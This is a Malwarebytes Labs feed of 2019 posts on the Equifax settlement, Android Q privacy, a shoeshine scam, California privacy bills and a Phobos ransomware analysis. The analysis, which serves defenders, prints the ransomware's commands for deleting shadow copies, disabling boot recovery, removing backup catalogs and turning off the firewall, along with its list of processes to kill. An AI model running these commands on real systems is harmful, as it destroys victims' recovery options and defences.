Techie Feeds

How to get your Equifax money and stay safe doing it

Malwarebytes - Tue, 07/30/2019 - 15:00

Following the enormous data breach of Equifax in 2017—in which roughly 147 million Americans suffered the loss of their Social Security numbers, addresses, credit card and driver’s license information, birthdates, and more—the company has agreed to a settlement with the US Federal Trade Commission, in which it will pay at least $650 million.

Much of that settlement—up to $425 million—is reserved for you, the consumers. Here’s how you can see if you’re eligible for a payment.

First, you can check if your sensitive data was compromised during the 2017 data breach by going to Equifax’s new settlement website:

It’s important to quickly note here that this website, which does not look like Equifax’s regular website, is a reported improvement from the last time Equifax tried to set up its own response, which, in the immediate aftermath of the 2017 breach, was described as “completely broken at best, and little more than a stalling tactic or sham at worst.”

Back to that settlement money: By inputting your last name and the last six digits of your Social Security Number (which is too many numbers, we should say), you can find out if you’re eligible for a claim of, at the very least, either 10 years of free credit monitoring or $125 paid through either a check or a pre-paid card.

You can file a claim at Equifax’s web portal here:

Depending on how the 2017 data breach affected you, you may be eligible for more payments.

For example, if you spent time trying to recover from identity theft or fraud that stemmed from Equifax’s data breach, you can claim $25 for each hour you spent on that work. That work includes placing and removing credit freezes and purchasing credit monitoring services.

Further, if you actually lost money from identity theft or fraud caused by the breach, you can make a claim to be reimbursed for up to $20,000. Documented evidence must be provided.

Beware the scams

Another corporate data breach settlement with the US government means another moment for heightened cybersecurity vigilance.

Equifax’s extremely broad settlement is, if you’ll pardon our stretched metaphor, akin to a dead whale in the open ocean: Sharks are coming.

As with any major news in America, especially news that affects more than 100 million people, the opportunity for cybercriminal attack is high. For example, after the European Union’s General Data Protection Regulation (GDPR) came into effect, countless company emails flooded Americans’ inboxes. Cybercriminals were not far behind, and they sent their own phishing emails that masqueraded as legitimate notices.

The same could happen with the Equifax settlement.

Remember, there is only one website right now to check if you’re eligible for a claim, and it’s the one we’ve listed above.

With the breach once again in everyone’s minds, it’s also a good time to remember how to protect yourself from identity theft. Revisit our blog from 2017 that covers various safety precautions, including obtaining credit monitoring, refusing to reply to texts and calls from unknown phone numbers, and stepping up your password protocol (don’t repeat passwords, make them complex). And for even more in-depth information on identity theft, take a look at this comprehensive article in our cybersecurity basics hub.

Stay safe, everyone.

The post How to get your Equifax money and stay safe doing it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Dark Android Q rises

Malwarebytes - Mon, 07/29/2019 - 17:55

Android Q, the upcoming 10th major release of the Android mobile operating system, was developed by Google with three major themes in mind: innovation, security, and privacy. Today, we are going to focus mostly on security and privacy, although there are still many potential changes and updates on the horizon that can be discussed.


Privacy has been a top priority in developing Android Q, as it’s important today to give users control and transparency over how their information is collected and used by apps and by our phones. There are significant changes made in Android Q across the platform to improve privacy, and we are going to inspect them one-by-one.

Note: Developers will need to review new privacy features and test their apps. Impacts can vary based on each app’s core functionality, targeting, and other factors. 

Picture 1: Device location

Let’s start with location. Apps can still ask the user for permission to access location, but in Android Q, the user sees a larger dialog with more choices about when to allow that access, as shown in Picture 1. Users can give apps access to location data all the time or only when the app is in focus (in use and in the foreground).

This additional control is made possible by a new location permission introduced in Android Q, ACCESS_BACKGROUND_LOCATION, which allows an app to access location in the background.

A detailed guide is available on how to adapt your app for the new location controls. 

Scoped storage

Outside of location, a new feature called “scoped storage” was introduced to give users more security and reduce app clutter. Android Q will still use the READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE permissions, but now apps targeting Android Q by default are given a filtered view into external storage.

Such apps can only see their own app-specific directory and specific types of media, and they need no permission to read or write files in that folder. Scoped storage also gives developers a private space on the device’s storage without requiring any specific permissions.

Note: There is a guide that describes how files are included in the filtered view, as well as how to update your app so that it can continue to share, access, and modify files that are saved on an external storage device.

From a security standpoint, this is a beneficial update. It stops malicious apps that depend on users granting access to sensitive data because they didn’t read the permission dialog and just clicked “yes.”

Background restrictions

Another important change is that Android Q restricts launching activities from the background without user interaction. This behavior helps reduce interruptions and keeps users more in control of what’s shown on their screens.

This new change applies to all apps running on Android Q. Even if your app targets API level 28 or lower and was originally installed on a device running Android 9, the restrictions will take effect after the device is upgraded to Android Q.

Note: Apps running on Android Q can start activities only when one or more of the following conditions are met.

Data and identifiers

To prevent tracking, starting in Android Q, Google will require app developers to request a special privileged permission (READ_PRIVILEGED_PHONE_STATE) before they can access the device’s non-resettable identifiers, such as the IMEI and serial number.

Note: Read the best practices to choose the right identifiers for your specific case, as many don’t need non-resettable device identifiers (for analytics purposes, for example).

Also, Android Q devices will now transmit a randomized MAC address by default. Although Google introduced MAC address randomization in Android 6.0, devices could only broadcast a random MAC address if the smartphone initiated a background Wi-Fi or Bluetooth scan. It’s worth mentioning, however, that security researchers proved they can still track devices with randomized MAC addresses.
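To make the idea of a “randomized MAC address” concrete, here is a short Python sketch (not Android’s actual implementation) that generates a random locally administered, unicast MAC address; these are the same two bit flags a randomized address must carry so it never collides with a vendor-assigned hardware address:

```python
import random

def random_mac() -> str:
    """Generate a randomized MAC address.

    Randomized addresses set the 'locally administered' bit (0x02) and
    clear the 'multicast' bit (0x01) in the first octet, so they never
    collide with vendor-assigned, universally administered addresses.
    """
    octets = [random.randint(0, 255) for _ in range(6)]
    octets[0] = (octets[0] | 0x02) & ~0x01  # locally administered, unicast
    return ":".join(f"{o:02x}" for o in octets)

print(random_mac())  # e.g. '66:3f:12:ab:09:c4' (second hex digit is 2, 6, a, or e)
```

Because the address changes per network, trackers can no longer use it as a stable device identifier—which is exactly why the research mentioned above, showing randomized MACs can still be defeated, matters.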

Wireless network restrictions

Another new feature in Android Q is that apps cannot enable or disable Wi-Fi. The WifiManager.setWifiEnabled() method always returns false.

In Android Q, users are instead prompted to enable or disable Wi-Fi via the Settings Panel, an API that allows apps to show system settings to users in the context of their app.

What’s more, to protect user privacy, manual configuration of the list of Wi-Fi networks is now restricted to system apps and device policy controllers (DPCs). A given DPC can be either the device owner or the profile owner.


Android Q also changed the scope of the READ_FRAME_BUFFER, CAPTURE_VIDEO_OUTPUT, and CAPTURE_SECURE_VIDEO_OUTPUT permissions. They are now signature-access only, which prevents silent access to the device’s screen content.

Picture 2

Apps that need access to the device’s screen content must use the MediaProjection API. If your app targets Android 5.1 (API level 22) or lower, users will see a permissions screen when running your app on Android Q for the first time, as shown in Picture 2. This gives users the opportunity to cancel or change permissions that the system previously granted to the app at install time.

In addition, Android Q introduces a new ACTIVITY_RECOGNITION permission for apps that need to detect the user’s step count or classify the user’s physical activity. This also lets users see in Settings how device sensor data is used.

Note: If your app relies on data from other built-in sensors on the device, such as the accelerometer and gyroscope, you don’t need to declare this new permission in your app.


Android Pie introduced the BiometricPrompt API to help apps utilize biometrics, including face, fingerprint, and iris. To keep users secure, the API was expanded in Android Q to support additional use cases, including both implicit and explicit authentication.

With explicit authentication, users must perform an action to proceed: a tap on the fingerprint sensor or, for face or iris authentication, a click on an additional button. High-value transactions such as payments, for example, must use the explicit flow.

The implicit flow does not require an additional user action. It is most often used for sign-in and autofill, where there is no need for extra confirmation on simple, low-risk transactions that can be easily reversed.

One more interesting change made in Android Q is support for TLS 1.3. It is claimed that secure connections can be established as much as 40 percent faster with TLS 1.3 compared to TLS 1.2. From a security perspective, TLS 1.3 is cleaner, less error prone, and more reliable. And from a privacy perspective, TLS 1.3 encrypts more of the handshake to better protect the identities of the participating parties.
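On Android, TLS negotiation is handled by the platform’s TLS stack, but the effect of requiring TLS 1.3 is easy to sketch outside Android. Here’s a minimal Python example (standard-library `ssl` module, not an Android API) that builds a client context refusing anything older than TLS 1.3:

```python
import ssl

# Build a client context that refuses to negotiate anything below TLS 1.3.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_3

# HAS_TLSv1_3 reports whether the linked OpenSSL build supports TLS 1.3 at all.
print("TLS 1.3 supported by this build:", ssl.HAS_TLSv1_3)
assert ctx.minimum_version == ssl.TLSVersion.TLSv1_3
```

Any handshake attempted with this context against a server that only speaks TLS 1.2 will fail outright rather than silently downgrade.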

Another handy new feature in BiometricPrompt is the ability to check if a device supports biometric authentication prior to invoking BiometricPrompt. This is useful when the app wants to show an “enable biometric sign-in” or similar item in their sign-in page or in-app settings menu. 

The last feature we want to point out is Adiantum, a storage encryption method that protects your data if your phone falls into someone else’s hands. Adiantum is a cryptographic innovation designed to make storage encryption efficient on devices without hardware cryptographic acceleration, so that all devices can be encrypted.

In Android Q, Adiantum will be part of the Android platform, and Google intends to update the Android Compatibility Definition Document (CDD) to require that all new Android devices be encrypted using one of the allowed encryption algorithms.

Beta 5 and beyond

Android Q Beta 1 was launched on March 13, and Beta 5 is already available to download. If you would like to try the beta, check whether your device is on the supported list and download it.

The Android 10 Q release date timeline

There is still one more beta to come before the final build drops sometime before the end of Q3, according to the timeline. Developers should dive into Android Q now and start learning about the new features and APIs they can use in their apps.

And perhaps the most important question of all—what will Android Q be named? The list of desserts starting with Q is rather small, and some suggestions that already came up among network users are:

What would you call it? And do you think these changes will better protect user privacy and security? Sound off in the comments.

The post Mobile Menace Monday: Dark Android Q rises appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 22 – 28)

Malwarebytes - Mon, 07/29/2019 - 15:50

Last week on Malwarebytes Labs, we offered an extensive analysis of the Malaysian Airlines Flight 17 investigation, updated users on the newest features in AdwCleaner 7.4.0 (it now detects pre-installed software), and provided a deep dive into Phobos ransomware. We also broke down the latest privacy cautions regarding the popular app FaceApp.

In addition, we looked at an interesting real-life shoeshine scam that was noticed online, and gave a comprehensive breakdown of the differences between stalkerware and parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (July 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Good Twitter Samaritans accidentally prevent shoeshine scam

Malwarebytes - Fri, 07/26/2019 - 16:45

A few days ago, Indian news portals were buzzing with tales of a well-worn shoeshine scam making its way onto social media. It’s a great example of how good-natured gestures can unwittingly aid scammers when high-visibility accounts are combined with a potential lack of fact-checking. Thankfully, it comes with a happy ending for a change.

What happened?

A Twitter user dragged this offline scam into the digital realm by mentioning that they’d run into an individual claiming to be a shoeshine boy. The scam goes as follows: They gently insist on shining your shoes, they refuse any money offered unrelated to said shoe shining (“I’m not begging”), and then they get to work.

While shining the shoes, eventually they mention that their life would change if they could get a shoeshine box. As the discussion continues, they pick the right moment to shift gears, and before you know it, they’re telling you to take them to a specific shop a small journey away, and the confused person with the sparkling shoes is handing over about US$25.

The scam here is that once the victim has gone, the scammer goes back to the shop and gives half the money back. It’s a smart piece of social engineering on the part of the scammer. Aside from anything else, “Please come with me to this random location 15 minutes away” isn’t a safe thing to do at the best of times.

What happened after this hit social media?

Glad you asked. This rather old scam may have played out the same way it always has, except the Twitter user mentioned above caught the attention of some big follower accounts. Hoping to assist the suspect shoeshine boy in their quest to get a shoeshine box, actress Parineeti Chopra went a little further and started mentioning the possibility of job offers. Given her account currently has 13.2 million followers, that’s a massive chunk of syndication for a fakeout.

As we’ve seen many times in the past, this could’ve just as easily been a malware scam, or a phish, or some other awful wheeze at the victim’s expense. When you’re blasting out content to that many people, one hopes it’d be checked beforehand. Alas, it was not. Would the person contacted by the scammer fall for it? Or would things take a different turn?

To the rescue

Weirdly, it took the multi-million-follower actress tweeting out a “help this person” comment for other people to point out that it was a fake [1], [2]. If she hadn’t, the person who first mentioned it might have parted with their cash.

You can see video of an actual encounter with someone who (it is claimed) is the same individual from the most recent anecdote. Essentially, if you’re in India and you’re approached for a shoeshine: fine. If there’s a sudden mention of shoeshine boxes and immediate trips to another location: politely decline and be on your way.

Summer is here…and so are the scams

This is an interesting case where unintentionally amplifying a scam actually helped to bring it down. You see that happen a fair bit in tech-centric realms, especially with so many scam hunters online and lurking on social media. However, this isn’t quite so common with real-world scams and certainly doesn’t typically play out in real time.

So-called fake news and other forms of misinformation can be incredibly damaging, and it doesn’t have to be at the international level. More commonplace scams targeting regular web users can be just as harmful on an individual level. Given summer is indeed upon us, it’s a good reminder to try and steer clear of scams whether online, offline, or a mixture of both.

The post Good Twitter Samaritans accidentally prevent shoeshine scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Changing California’s privacy law: A snapshot at the support and opposition

Malwarebytes - Thu, 07/25/2019 - 15:59

This month, the corporate-backed legislative battle against California privacy met a blockade, as one Senate committee voted down some bills and negotiated changes to others that, as originally written, could have weakened the state’s data privacy law, the California Consumer Privacy Act (CCPA).

Though the bills’ authors have raked in thousands of dollars in campaign contributions from companies including Facebook, AT&T, and Google, records portray broader donor networks, which include Political Action Committees (PACs) for real estate, engineering, carpentry, construction, electrical, and municipal workers.

Instead, Big Tech relied on advocacy and lobbying groups to help push favorable legislative measures forward. For example, one bill that aimed to lower restrictions if companies provide consumer data to government agencies was supported by TechNet and Internet Association.

Those two groups alone represent the interests of Amazon—which was caught offering a corporate job to a Pentagon official involved in a $10 billion Department of Defense contract that the company is currently seeking—and Microsoft—another competitor in the same $10 billion contract—along with Google, Twitter, Lyft, Uber, PayPal, Accenture, and Airbnb.

Below is a snapshot of five CCPA-focused bills that were all scheduled for a vote during a July 9 hearing by the California Senate Judiciary Committee. The committee chair, Senator Hannah-Beth Jackson, pulled a 12-hour-plus shift that day, trying to clear through more than 40 bills.

Yet another day in politics.

We hope to provide readers with a look at both the support and opposition to these bills, along with a view of who wrote the bills and what groups have donated to their authors. It is important to remember that lawmaking is rarely a straight line, and a campaign contribution is far from an endorsement.

The assembly bills

AB 1416
  • What’s it all about? Exceptions to the CCPA when companies provide consumer data to government agencies
  • Author: Assemblymember Ken Cooley
  • Author’s top 2018 donors: the California Democratic Party ($111,192), the State Building and Construction Trades Council of California PAC Small Contributor Committee ($17,600), the California State Council of Laborers PAC ($17,600).
  • Author’s tech donors: AT&T ($8,800), Facebook ($6,900)
  • Supported by: Internet Association, Technet, Tesla, Symantec, California Land Title Association, California Alliance of Caregivers, among others
  • Opposed by: ACLU of California, Electronic Frontier Foundation, Common Sense Kids Action, and Privacy Rights Clearinghouse

AB 1416 would have created a new exception to the CCPA for any business that “provides a consumer’s personal information to a government agency solely for the purposes of carrying out a government program, if specified requirements are met.”

The bill would have granted companies the option to neglect a consumer’s decision to opt-out of having their data sold to another party, so long as the sale of that consumer’s data was “for the sole purpose of detecting security incidents, protecting against malicious, deceptive, fraudulent, or illegal activity, and prosecuting those responsible for that activity.”

According to multiple privacy groups, those exceptions were too broad. In a letter signed by ACLU of California, EFF, Common Sense Kids Action, and Privacy Rights Clearinghouse, the groups wrote:

“Given the breadth of these categories, especially with the increasing use of machine learning and other data-driven algorithms, there is no practical limit on the kinds of data that might be sold for these purposes. It would even allow sales based on the purchaser’s asserted purpose, increasing the potential for abuse, much like the disclosure of millions of Facebook user records by Cambridge Analytica.”

These challenges were never tested with a vote, though, as Asm. Cooley pulled the bill before the committee hearing ended.

AB 873
  • What’s it all about? Changing CCPA’s definition of “deidentified” information
  • Author: Assemblymember Jacqui Irwin
  • Author’s top 2018 donors: California Democratic Party ($105,143), the State Building and Construction Trades Council of California PAC ($17,600), the Professional Engineers in California Government PECG-PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), AT&T ($8,200), Hewlett Packard ($3,700)
  • Supported by: California Chamber of Commerce (sponsor), Internet Association, Technet, Advanced Medical Technology Association, California News Publishers Association, among others
  • Opposed by: ACLU of California, EFF, Campaign for a Commercial-Free Childhood, Access Humboldt, Oakland Privacy, Consumer Reports, among others

AB 873 would have narrowed the scope for what CCPA protects—“personal information”—by broadening the definition of something that CCPA currently does not protect—“deidentified” information.

According to the bill, the definition of “deidentified” information would now include “information that does not identify, and is not reasonably linkable, directly or indirectly, to a particular consumer.”

Privacy advocates claimed the bill had too broad a reach. In a letter, several opponents wrote that AB 873 “would allow businesses to track, profile, recognize, target, and manipulate consumers as they encountered them in both online and offline settings while entirely exempting those practices from the scope of the CCPA, as long as the information used to do so was not tied to a person’s ‘real name,’ ‘SSN’ or similar traditional identifiers.”

During the Senate committee hearing, Asm. Irwin defended her bill by saying that CCPA’s current definition of deidentified information was “unworkable.” She then rebuffed suggestions by the committee chair to add amendments to her bill.

The bill failed to pass on the committee’s 3–3 vote.

AB 25
  • What’s it all about? Exceptions to CCPA for employers that collect data from their employees and job applicants
  • Author: Assemblymember Ed Chau
  • Author’s top 2018 donors: California State Council of Service Employees ($17,600), the California State Council of Laborers ($13,200), and the California State Pipe Trades Council ($10,000).
  • Author’s tech donors: Facebook ($4,400), AT&T ($3,900), Hewlett Packard ($3,200), Google ($2,500), Intuit ($2,000)
  • Supported by: Internet Association, Technet, California Chamber of Commerce, National Payroll Reporting Consortium, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, among others

AB 25, as originally written, would have removed CCPA protections for some types of data that employers collect both on their employees and their job applicants.

Hayley Tsukayama, legislative analyst for EFF, said that a concern she and other privacy advocates had with the bill was that employers are beginning to collect more information on their employees that increasingly resembles consumer-type data.

“We are seeing a lot more of these workplace surveillance programs pop up,” Tsukayama said over the phone, giving a hypothetical example of a fitness tracker for employees whose data could be shared with health insurance companies. “The ways that this collection is being introduced into the workplace, it’s not necessary for the employer-employee relationship, and it is more in the vein of consumer data.”

After Chau agreed to add amendments to his bill, the Senate committee passed it. The bill, if it becomes law, will sunset in one year, giving legislators and labor groups another opportunity to review its impact in a short time.

AB 846
  • What’s it all about? Customer loyalty programs
  • Author: Assemblymember Autumn Burke
  • Author’s top 2018 donors: State Building and Construction Trades Council of California PAC ($17,600), SEIU California State Council Small Contributor Committee ($17,600), IBEW Local 18 Water & Power Defense League ($17,600), California State Council of Laborers PAC ($17,600)
  • Author’s tech donors: Facebook ($8,800), Technet California Political Action Committee ($8,449), Charter Communications ($7,900), AT&T and its affiliates ($7,300)
  • Supported by: California Chamber of Commerce, California Grocers Association, California Hotel & Lodging Association, California Restaurant Association, Ralphs Grocery Company, Wine Institute, among others
  • Opposed, unless amended, by: ACLU of California, EFF, Common Sense Kids Action, Privacy Rights Clearinghouse, Access Humboldt

AB 846 targets CCPA’s current non-discrimination clause that prohibits companies from offering incentives—like lowered prices—to customers based on their data practices.

The bill would clarify that CCPA’s regulations are not violated when businesses offer “a different price, rate, level, or quality of goods or services to a consumer if the offering is in connection with a consumer’s voluntary participation in a loyalty, rewards, premium features, discount, or club card program.”

The bill received so many changes, though, that some groups were puzzled over what it would allow.

“There was a point at which [AB 846] said any service that has a functionality directly related to the collection of, and use, of personal information was exempt,” Tsukayama said. “We spent a lot of time going ‘Well, what does that mean?’ We never got a satisfactory answer.”

She continued: “We were concerned that this would cover a lot of ad tech, or invasive company programs, to collect more data.”

With additional amendments to be added, the Senate committee passed the bill.

AB 1564
  • What’s it all about? Whether businesses have to provide a phone number for consumer data requests
  • Author: Assemblymember Marc Berman
  • Author’s top 2018 donors: California State Council of Service Employees ($26,100), Northern California Carpenters Regional Council SCC ($17,600), American Federation of State, County & Municipal Employees – CA People SCC ($17,600)
  • Author’s tech donors: Facebook ($8,800), TechNet PAC ($6,526)
  • Supported by: Internet Association (sponsor), Engine, Coalition of Small & Disabled Veteran Businesses, Small Business California, National Federation of Independent Businesses (CA), among others
  • Opposed by: ACLU of California, EFF, Center for Digital Democracy, Oakland Privacy, Access Humboldt, Privacy Rights Clearinghouse, among others  

CCPA allows Californians to contact the companies that collect their data and make requests about that data, including accessing it, changing it, and deleting it. The law states that companies must provide at least two methods of contact, including one toll-free telephone number, for those requests.

AB 1564 would allow online-only businesses to provide their direct consumers with just one method of contact—an email address—for data requests.

Privacy advocates previously warned that the bill could make it harder for those with limited Internet access to assert their privacy rights.

The bill, which will be amended, passed the Senate committee.

What comes next?

The California Senate is currently in a summer recess, scheduled to return August 12. The bills that passed the Senate Judiciary Committee—ABs 25, 846, and 1564, regarding employee data, loyalty programs, and email address contacts—will next be heard by the Senate Appropriations Committee, a separate committee of lawmakers who oversee and move forward bills that have a fiscal component.

That committee has until August 30 to move bills to the floor.

Afterward, the Legislature has until September 13 to send bills to Governor Gavin Newsom’s desk for signature.

The post Changing California’s privacy law: A snapshot at the support and opposition appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A deep dive into Phobos ransomware

Malwarebytes - Wed, 07/24/2019 - 18:09

Phobos ransomware appeared at the beginning of 2019. This new strain is strongly based on a previously known family, Dharma (a.k.a. CrySis), and is probably distributed by the same group.

While attribution is by no means conclusive, you can read more about potential links between Phobos and Dharma here, including an intriguing connection with the xDedic marketplace.

Phobos is one of several ransomware families distributed via hacked Remote Desktop Protocol (RDP) connections. This isn’t surprising, as hacked RDP servers are a cheap commodity on the underground market and can make for an attractive, cost-efficient dissemination vector for threat groups.

In this post, we will take a look at the implementation of the mechanisms used in Phobos ransomware, as well as its internal similarity to Dharma.

Analyzed sample


Behavioral analysis

This ransomware does not deploy any UAC bypass techniques. When we try to run it manually, the UAC confirmation pops up:

If we accept it, the main process deploys another copy of itself with elevated privileges. It also executes some commands via the Windows shell.

Two types of ransom notes are dropped: a .txt file and an .hta file. After the encryption process finishes, the .hta ransom note is displayed:

Ransom note in the .hta version

Ransom note in the .txt version

Even after the initial ransom note is displayed, the malware keeps running in the background and encrypts newly created files.

All local disks, as well as network shares, are attacked.

It also uses several persistence mechanisms: it installs itself in %APPDATA% and in the Startup folder, adding registry keys to autostart its process when the system is restarted.

A view from Sysinternals’ Autoruns

These mechanisms make Phobos ransomware very aggressive: the infection doesn’t end with a single run but can repeat multiple times. To prevent reinfection, all persistence mechanisms should be removed as soon as a Phobos attack is noticed.

The encryption process

The ransomware is able to encrypt files without an Internet connection (at this point, we can guess that it comes with a hardcoded public key). Each file is encrypted with an individual key and initialization vector: the same plaintext generates a different ciphertext in each file.

It encrypts a variety of files, including executables. Encrypted files have the attacker’s email address added to their names. This particular variant of Phobos also adds the extension ‘.acute’; however, different extensions have been encountered in different variants. The general pattern is: <original name>.id[<victim ID>-<version ID>][<attacker's e-mail>].<added extension>
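The naming pattern above is regular enough to parse mechanically. Here is a Python sketch that breaks an encrypted filename into its components; the sample filename, victim ID, and email address below are hypothetical, built only to match the documented pattern:

```python
import re

# <original name>.id[<victim ID>-<version ID>][<attacker's e-mail>].<extension>
PHOBOS_NAME = re.compile(
    r"^(?P<original>.+)\.id\[(?P<victim>[^-\]]+)-(?P<version>[^\]]+)\]"
    r"\[(?P<email>[^\]]+)\]\.(?P<ext>\w+)$"
)

def parse_name(filename: str):
    """Return the pattern's components as a dict, or None if no match."""
    m = PHOBOS_NAME.match(filename)
    return m.groupdict() if m else None

# Hypothetical example constructed from the pattern (not a real victim ID):
info = parse_name("report.docx.id[A1B2C3D4-2275][attacker@example.com].acute")
```

A matching name yields the original filename, victim and version IDs, contact email, and added extension; anything else returns None.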

A visualization of the encrypted content does not display any recognizable patterns. This suggests that either a stream cipher or a cipher with chained blocks was used (possibly AES in CBC mode). For example, here is a simple BMP before and after encryption:

Looking inside an encrypted file, we can see a particular block at the end, separated from the encrypted content by ‘0’-byte padding. The first 16 bytes of this block are unique per file (a possible initialization vector). Then comes a 128-byte block that is the same in each file from the same infection, which probably means it contains the encrypted key, uniquely generated on each run. At the end we find a six-character keyword typical of this ransomware. In this case it is ‘LOCK96’; however, different versions of Phobos have been observed with different keywords, e.g., ‘DAT260’.
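Based on that description, the trailer can be carved out with simple slicing. The layout assumed below (zero padding, then a 16-byte candidate IV, a 128-byte encrypted key block, and the six-character marker at the very end) is a reconstruction from these observations, not a verified file-format specification; real samples may carry additional metadata:

```python
def parse_trailer(data: bytes) -> dict:
    """Carve the trailer fields of a Phobos-encrypted file, assuming the
    layout described above: [ciphertext][0-padding][16-byte IV]
    [128-byte encrypted key][6-byte marker]."""
    marker = data[-6:].decode("ascii", errors="replace")  # e.g. 'LOCK96'
    block = data[-(6 + 128 + 16):-6]                      # IV + key block
    iv, encrypted_key = block[:16], block[16:]
    return {"iv": iv, "encrypted_key": encrypted_key, "marker": marker}

# Synthetic file: fake ciphertext, zero padding, IV, key block, marker.
fake = b"\xaa" * 50 + b"\x00" * 10 + bytes(range(16)) + b"\xbb" * 128 + b"LOCK96"
trailer = parse_trailer(fake)
```

On real samples, the per-infection 128-byte block is the field a defender would need the attacker’s private key to decrypt.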

In order to fully understand the encryption process, we will look inside the code.


In contrast to most malware, which comes protected by some crypter, Phobos is not packed or obfuscated. Although the lack of packing is not common in the general population of malware, it is common among malware that is distributed manually by the attackers.

The execution starts in WinMain function:

During its execution, Phobos starts several threads responsible for its different actions, such as killing blacklisted processes, executing commands from the command line, and encrypting accessible drives and network shares.

Used obfuscation

The code of the ransomware is not packed or obfuscated. However, some constants, including strings, are protected by AES and decrypted on demand. A particular string can be requested by its index, for example:

The AES key used for this purpose is hardcoded (in obfuscated form) and imported each time a chunk of data needs to be decrypted.

Decrypted content of the AES key

The Initialization Vector is set to 16 NULL bytes.
The code responsible for loading the AES key is given below. The function wraps the key into a BLOBHEADER structure, which is then imported.

From the BLOBHEADER structure, we can read the following information: 0x8 – PLAINTEXTKEYBLOB, 0x2 – CUR_BLOB_VERSION, 0x6610 – CALG_AES_256.
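For illustration, the same blob can be reconstructed in a few lines. This follows the documented PLAINTEXTKEYBLOB layout (BLOBHEADER followed by the key length and the raw key bytes) rather than the sample's exact code:

```python
import struct

# Constants read from the BLOBHEADER above
PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 0x2
CALG_AES_256 = 0x6610

def make_key_blob(aes_key: bytes) -> bytes:
    """Wrap a raw AES-256 key the way CryptImportKey expects a plaintext key
    blob: BLOBHEADER (bType, bVersion, reserved, aiKeyAlg) + key length + key."""
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_256)
    return header + struct.pack("<I", len(aes_key)) + aes_key
```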

Example of a decrypted string:

Among the decrypted strings we can also see the list of the attacked extensions

We can also find a list of some keywords:

acute actin Acton actor Acuff Acuna acute adage Adair Adame banhu banjo Banks Banta Barak Caleb Cales Caley calix Calle Calum Calvo deuce Dever devil Devoe Devon Devos dewar eight eject eking Elbie elbow elder phobos help blend bqux com mamba KARLOS DDoS phoenix PLUT karma bbc CAPITAL

This is a list of possible extensions used by this ransomware family. They are (probably) used to recognize and skip files that have already been encrypted by a ransomware from this family. The extension that will be used in the current encryption round is hardcoded.

One of the encrypted strings specifies the formula for the file extension, which is later filled in with the victim ID:

UNICODE ".id[<unique ID>-1096].[].acute"
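The renaming pattern can be sketched as follows (the victim ID and e-mail address below are hypothetical placeholders, not values from the actual sample):

```python
# A sketch of the naming formula described above.
def encrypted_name(original, victim_id, version_id, email, ext):
    return f"{original}.id[{victim_id}-{version_id}][{email}].{ext}"

name = encrypted_name("photo.bmp", "A1B2C3D4", "1096", "attacker@example.com", "acute")
# name == "photo.bmp.id[A1B2C3D4-1096][attacker@example.com].acute"
```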

Killing processes

The ransomware comes with a list of processes that it kills before the encryption is deployed. Just like other strings, the full list is decrypted on demand:

msftesql.exe sqlagent.exe sqlbrowser.exe sqlservr.exe sqlwriter.exe
oracle.exe ocssd.exe dbsnmp.exe synctime.exe agntsvc.exe
mydesktopqos.exe isqlplussvc.exe xfssvccon.exe mydesktopservice.exe
ocautoupds.exe agntsvc.exe agntsvc.exe agntsvc.exe encsvc.exe
firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe
mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe
msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe steam.exe
thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe

These processes are killed so that they do not block access to the files that are about to be encrypted.
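The matching step can be sketched as a simple case-insensitive lookup (the set below is an abbreviated stand-in for the full decrypted list, and no processes are actually terminated here):

```python
# Abbreviated stand-in for the decrypted blacklist shown above.
BLACKLIST = {"sqlservr.exe", "mysqld.exe", "outlook.exe", "winword.exe"}

def processes_to_kill(running_processes):
    """Return the names of running processes that match the blacklist."""
    return [name for name in running_processes if name.lower() in BLACKLIST]
```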

A fragment of the function enumerating and killing processes

Deployed commands

The ransomware executes several commands from the command line. These commands are intended to prevent the encrypted files from being recovered from backups.

Deleting the shadow copies:

vssadmin delete shadows /all /quiet
wmic shadowcopy delete

Changing bcdedit options (preventing the system from booting into recovery mode):

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

Deleting the backup catalog on the local computer:

wbadmin delete catalog -quiet

It also disables the firewall:

netsh advfirewall set currentprofile state off
netsh firewall set opmode mode=disable
exit

Attacked targets

Before Phobos starts its malicious actions, it checks the system locale (using GetLocaleInfoW with the options LOCALE_SYSTEM_DEFAULT and LOCALE_FONTSIGNATURE). It terminates execution if the 9th bit of the output is set. That bit represents the Cyrillic alphabet, so systems that have a Cyrillic locale set as default are not affected.
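Assuming the bitfield semantics described above (bit 9 of the font-signature output indicating Cyrillic support, and Cyrillic-locale systems being skipped), the gate can be sketched as:

```python
# Sketch of the locale gate; the bit position is taken from the analysis above.
CYRILLIC_BIT = 9

def should_attack(font_signature_bits: int) -> bool:
    """Skip machines whose default locale reports Cyrillic support."""
    return ((font_signature_bits >> CYRILLIC_BIT) & 1) == 0
```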

Both local drives and network shares are encrypted.

Before the encryption starts, Phobos lists all the files and compares their names against the hardcoded lists. The lists are stored inside the binary in AES-encrypted form, with strings separated by the delimiter ';'.

Fragment of the function decrypting and parsing the hardcoded lists

Among those lists, we can find e.g. a blacklist (these files will be skipped). The listed files are related to the operating system; in addition, info.txt and info.hta are the names of the Phobos ransom notes:


There is also a list of directories to be skipped – in the analyzed case it contains only one directory: C:\Windows.

The skipped files also include those with the extensions used by Phobos variants, mentioned before.

There is also a pretty long whitelist of extensions:

